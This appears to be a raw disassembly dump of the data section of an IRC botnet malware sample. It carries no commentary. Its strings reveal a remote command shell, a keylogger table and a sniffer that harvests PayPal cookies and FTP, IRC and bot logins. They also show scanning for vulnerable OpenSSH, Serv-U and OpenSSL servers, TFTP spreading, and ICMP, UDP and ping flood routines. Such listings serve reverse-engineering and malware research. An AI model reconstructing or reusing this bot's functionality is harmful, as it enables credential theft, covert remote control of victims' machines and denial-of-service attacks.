aPm db 'PM',0 ; DATA XREF: sub_40F96B+28A�o
align 10h
a__ db '..',0 ; DATA XREF: sub_40F96B+237�o
align 4
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+149�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_40F96B+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_40F96B+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 10h
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_40F96B+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_40F96B+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4100DC+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_434648 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_4101FD+171�o
aServerFailed_0 db '- server failed, returned %d',0
align 4
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_4101FD+116�o
dword_43468C dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_4101FD+BB�o
aClientConnecti db '- client connection from %s:%d.',0
unk_4346B8 db 2Dh ; - ; DATA XREF: sub_4103AB+15E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_38 db 'Failed to start client thread, error: <%d>.',0
unk_4346F4 db 2Dh ; - ; DATA XREF: sub_4103AB+E9�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
unk_43473C db 2Dh ; - ; DATA XREF: sub_41053C+1AA�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_39 db 'Failed to start connection thread, error: <%d>.',0
unk_43477C db 2Dh ; - ; DATA XREF: sub_41053C+E1�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 10h
unk_4347C0 db 2Dh ; - ; DATA XREF: sub_4107C0+1E9�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
unk_4347EC db 2Dh ; - ; DATA XREF: sub_4107C0+1C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 4
unk_434818 db 2Dh ; - ; DATA XREF: sub_4107C0+1A2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_4107C0+172�o
align 4
unk_434854 db 2Dh ; - ; DATA XREF: sub_4107C0+E1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 10h
unk_434880 db 2Dh ; - ; DATA XREF: sub_4109C5:loc_410A0A�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 4
unk_4348AC db 2Dh ; - ; DATA XREF: sub_410A1F+1B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 4
unk_4348E4 db 2Dh ; - ; DATA XREF: sub_410A4E+219�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 4
unk_43491C db 2Dh ; - ; DATA XREF: sub_410A4E+1FB�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_40 db '- Failed to start client thread, error: <%d>.',0
align 4
unk_434958 db 2Dh ; - ; DATA XREF: sub_410A4E+177�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0
unk_43499C db 2Dh ; - ; DATA XREF: sub_410A4E+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 4
unk_4349D8 db 2Dh ; - ; DATA XREF: sub_410A4E+70�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 4
unk_434A1C db 2Dh ; - ; DATA XREF: sub_410A4E+3D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 4
unk_434A48 db 2Dh ; - ; DATA XREF: sub_410CD6+DE�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 4
unk_434A7C db 2Dh ; - ; DATA XREF: sub_410CD6+59�o
; sub_410CD6+8B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
unk_434AC4 db 2Dh ; - ; DATA XREF: sub_410E27+AF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell.',0
unk_434AEC db 2Dh ; - ; DATA XREF: sub_410E27+7E�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create shell stdin pipe, error: <%d>.',0
align 4
unk_434B2C db 2Dh ; - ; DATA XREF: sub_410E27+5C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0
unk_434B6C db 2Dh ; - ; DATA XREF: sub_410F20+C3�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_410F20+8C�o
align 4
unk_434BAC db 2Dh ; - ; DATA XREF: sub_410FF9+A1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
dword_434BE8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4111CE+1B2�o
aFailedToSta_41 db '- Failed to start server on Port %d.',0
align 4
dword_434C1C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4111CE+18F�o
aFailedToSta_42 db '- Failed to start client thread, error: <%d>.',0
align 4
dword_434C58 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4111CE+114�o
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_434C9C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4113D3+1F9�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 10h
dword_434CE0 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4113D3+18A�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 10h
dword_434D20 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_4113D3+F2�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 10h
dword_434D60 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411797+41C�o
aTftpTransferCo db 'Tftp transfer complete to: %s',0 ; DATA XREF: sub_411797+3C4�o
align 4
aTftpTransferSt db 'Tftp transfer started to: %s',0 ; DATA XREF: sub_411797+2CD�o
align 10h
dw 8
unicode 0, <>,0
aB: ; DATA XREF: sub_411CF5:loc_411DD8�o
unicode 0, <b>,0
dd 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dword_435238 dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_4354E4 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_411CF5+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_43551C dd 234032Dh, 6C79656Bh, 302676Fh, 7325202Dh, 0 ; DATA XREF: sub_411C14+AE�o
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_411C14+88�o
align 4
asc_43554C: ; DATA XREF: sub_411C14+2C�o
unicode 0, <\>,0
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_411CF5+228�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_411CF5+1E5�o
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_411CF5+8F�o
align 4
off_435598 dd offset dword_435E10 ; DATA XREF: sub_411FD6+2B9�r
dd offset off_435E0C
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
dword_4355A8 dd 6F6C2E3Ah, 6E6967h, 3 dup(0) ; DATA XREF: sub_411FD6+1DE�o
dword_4355BC dd 0 ; DATA XREF: sub_411FD6+2B2�r
dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp_0 db 'HTTP',0 ; DATA XREF: UPX0:004355A4�o
align 4
aFtp db 'FTP',0 ; DATA XREF: UPX0:004355A0�o
off_435E0C dd offset dword_435238+11h ; DATA XREF: UPX0:0043559C�o
dword_435E10 dd 544F42h ; DATA XREF: UPX0:off_435598�o
dword_435E14 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+317�o
aRecvFailedRetu db '- recv() failed, returned %d',0
align 10h
dword_435E40 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+2C6�o
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
dword_435E74 dd 234032Dh, 696E7370h, 3026666h, 2Dh ; DATA XREF: sub_411FD6+24C�o
dword_435E84 dd 4E53505Bh, 5D464649h, 0 ; DATA XREF: sub_411FD6+235�o
dword_435E90 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+186�o
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 10h
dword_435EC0 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+103�o
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
dword_435EEC dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_411FD6+85�o
aSocketFailedRe db '- socket() failed, returned %d',0
align 4
aHashin db ':!hashin',0 ; DATA XREF: sub_412361+103�o
align 4
a_hashin db ':.hashin',0 ; DATA XREF: sub_412361+EE�o
align 10h
aIdent_0 db ':!ident',0 ; DATA XREF: sub_412361+D9�o
a_ident db ':.ident',0 ; DATA XREF: sub_412361+C8�o
a_login db ':.Login',0 ; DATA XREF: sub_412361+B7�o
aLogin_0 db ':!Login',0 ; DATA XREF: sub_412361+A6�o
aLogin_1 db ':!login',0 ; DATA XREF: sub_412361+95�o
a_login_0 db ':.login',0 ; DATA XREF: sub_412361+84�o
a366 db '366 ',0 ; DATA XREF: sub_412361+73�o
align 4
a302_0 db '302 ',0 ; DATA XREF: sub_412361:loc_4123C3�o
align 10h
aJoin_0 db 'JOIN #',0 ; DATA XREF: sub_412361+4D�o
align 4
aPsniff_0 db 'PSNIFF//',0 ; DATA XREF: sub_412361+3C�o
align 4
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412361+2B�o
align 10h
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412361+5�o
align 4
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_412478+62�o
aOper db 'oper ',0 ; DATA XREF: sub_412478+51�o
align 10h
aNick_1 db 'NICK ',0 ; DATA XREF: sub_412478:loc_4124B8�o
; sub_4124EE+2B�o
align 4
aOper_0 db 'OPER ',0 ; DATA XREF: sub_412478+2B�o
align 10h
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_412478+5�o
align 4
aPass_1 db 'PASS ',0 ; DATA XREF: sub_4124EE+73�o
align 4
aUser_3 db 'USER ',0 ; DATA XREF: sub_4124EE+62�o
align 4
a230 db '230 ',0 ; DATA XREF: sub_4124EE:loc_41253F�o
align 4
a220 db '220 ',0 ; DATA XREF: sub_4124EE+3C�o
align 4
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_4124EE+5�o
align 4
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_412575+73�o
aPaypal_com db 'paypal.com',0 ; DATA XREF: sub_412575+62�o
align 10h
aPaypal_com_0 db 'PAYPAL.COM',0 ; DATA XREF: sub_412575+51�o
align 4
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_412575:loc_4125B5�o
align 4
aPaypal db 'paypal',0 ; DATA XREF: sub_412575+2B�o
align 4
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_412575+5�o
align 4
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_4125FC+51�o
align 4
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_4125FC:loc_41263C�o
align 4
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_4125FC+2B�o
align 4
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_4125FC+5�o
align 4
unk_436084 db 2Dh ; - ; DATA XREF: sub_412661+3EC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_4360BC db 2Dh ; - ; DATA XREF: sub_412661+382�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_4360F4 db 2Dh ; - ; DATA XREF: sub_412661+351�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
unk_436128 db 2Dh ; - ; DATA XREF: sub_412661+31B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_43615C db 2Dh ; - ; DATA XREF: sub_412661+2E2�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
unk_436190 db 2Dh ; - ; DATA XREF: sub_412661+14B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 10h
unk_4361C0 db 2Dh ; - ; DATA XREF: sub_412661+C5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 4
unk_4361EC db 2Dh ; - ; DATA XREF: sub_412A54+5E�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
dword_436214 dd 234032Dh, 736F6464h, 202D0302h, 646E6573h, 72726520h
; DATA XREF: sub_412B09+302�o
dd 203A726Fh, 6425h
unk_436230 db 2Dh ; - ; DATA XREF: sub_412E9E+397�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
unk_43627C db 2Dh ; - ; DATA XREF: sub_412E9E+307�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 4
unk_4362C4 db 2Dh ; - ; DATA XREF: sub_412E9E+12A�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 4
unk_4362E4 db 2Dh ; - ; DATA XREF: sub_412E9E+C2�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
unk_436314 db 2Dh ; - ; DATA XREF: sub_412E9E+49�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 10h
unk_436340 db 2Dh ; - ; DATA XREF: sub_413285+13C�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 4
unk_43636C db 2Dh ; - ; DATA XREF: sub_413285+6E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
unk_436394 db 2Dh ; - ; DATA XREF: sub_413411+1C6�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 10h
unk_4363C0 db 2Dh ; - ; DATA XREF: sub_413411+8E�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 4
dword_4363E8 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_413627+4B�o
